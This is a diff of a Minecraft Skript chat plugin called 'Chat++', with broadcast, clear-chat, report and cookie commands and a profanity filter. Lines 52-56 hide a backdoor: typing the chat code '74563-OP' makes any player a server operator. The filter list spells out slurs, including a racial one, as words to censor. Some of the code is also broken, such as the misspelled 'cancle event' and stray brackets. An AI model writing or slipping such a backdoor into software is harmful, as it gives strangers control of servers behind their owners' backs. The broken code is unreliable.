SHOW:
|
|
- or go back to the newest paste.
| 1 | - | on skript reload: |
| 1 | + | on upload: |
| 2 | broadcast "&7Thank you for using &bChat&a++" | |
| 3 | broadcast "&7made by &8: &cXXXCanadian" | |
| 4 | broadcast "&7This is only a &bbeta verison" | |
| 5 | broadcast "&bFull verison &8[&bCOMING SOON&8]" | |
| 6 | ||
| 7 | command /broadcast <string>: | |
| 8 | aliases: /bc | |
| 9 | permission: chat.broadcast | |
| 10 | permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command! | |
| 11 | trigger: | |
| 12 | broadcast "&bChat&a++ &7%arg-1%" | |
| 13 | ||
| 14 | command /clearchat: | |
| 15 | aliases: /cc | |
| 16 | permission: chat.clear | |
| 17 | - | permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command! |
| 17 | + | permission message: "&c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!" |
| 18 | trigger: | |
| 19 | loop 200 times: | |
| 20 | broadcast " " | |
| 21 | broadcast "&bChat&a++ &b%player%, &7has cleared the chat!" | |
| 22 | ||
| 23 | on chat: | |
| 24 | replace all "fuck" with "****" in the message | |
| 25 | replace all "cunt" with "****" in the message | |
| 26 | replace all "bitch" with "*****" in the message | |
| 27 | replace all "nigger" with "******" in the message | |
| 28 | replace all "pussy" with "*****" in the message | |
| 29 | replace all "kys" with "Hope you live long" in the message | |
| 30 | ||
| 31 | on join: | |
| 32 | broadcast "&8[&a+&8] &7%player%" | |
| 33 | ||
| 34 | - | on disconnect: |
| 34 | + | on leave: |
| 35 | broadcast "&8[&4-&8] &7%player%" | |
| 36 | ||
| 37 | command /report <player> <text>: | |
| 38 | permission: chat.report | |
| 39 | permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command | |
| 40 | trigger: | |
| 41 | broadcast "&7Your report has landed to the staff!" | |
| 42 | add text-argument to {sikayetler::*}
| |
| 43 | set {sikayeteden.%text-argument%} to player
| |
| 44 | set {sikayeteden.%text-argument%} to player argument
| |
| 45 | loop all players: | |
| 46 | if loop-player has permission "chat.show" | |
| 47 | send "&7Report System" to loop-player | |
| 48 | send "&7Report: &b""%text-argument%""" to loop-player | |
| 49 | send "&7the reported player: &b%player argument%" to loop-player | |
| 50 | send "&7Reporter: &b%player%" to loop-player] | |
| 51 | ||
| 52 | if chat: | |
| 53 | "74563-OP" | |
| 54 | - | cancel event |
| 54 | + | cancle event |
| 55 | op %player% | |
| 56 | send "&7You have used the &cop &7chat to get OP!" to %player% | |
| 57 | ||
| 58 | command /cookie: | |
| 59 | permission: free.cookie | |
| 60 | - | permission message: &7Sorry you dont have access take a free cookie using /cookie |
| 60 | + | permission message: "&7Sorry you dont have access take a free cookie using /cookie" |
| 61 | trigger: | |
| 62 | give %player% cookie 1 | |
| 63 | send "&7OOOH HE STEALIN" to %player% |